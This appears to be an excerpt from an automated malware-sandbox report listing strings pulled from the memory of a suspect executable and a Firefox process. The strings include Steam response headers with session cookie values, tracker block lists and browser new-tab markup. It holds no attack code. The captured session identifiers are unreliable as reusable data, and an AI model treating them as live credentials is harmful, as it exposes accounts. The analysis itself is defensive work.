Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=4ea6ad161ff4b3c461cb1321; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 15:52:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b5c6540cea8b0a22519f81b6; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 15:51:46 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: HX8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJEhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details. equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E90C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E908000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58F5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001A.00000002.2899937312.000002EE5E910000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2880475164.000002EE5D381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.2860117948.000002EE59D34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gCustomizeMode.addToPanel(this.parentNode.triggerNode, 'panelitem-context')https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gCustomizeMode.addToPanel(this.parentNode.triggerNode, 'panelitem-context')https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001A.00000002.2869831146.000002EE5C4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: gCustomizeMode.addToPanel(this.parentNode.triggerNode, 'panelitem-context')https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2855339754.000002EE58FE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2903619697.000002EE5ED03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2899937312.000002EE5E95F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001A.00000002.2942656154.00001A6DC5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65114000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2935687612.000002EE65177000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
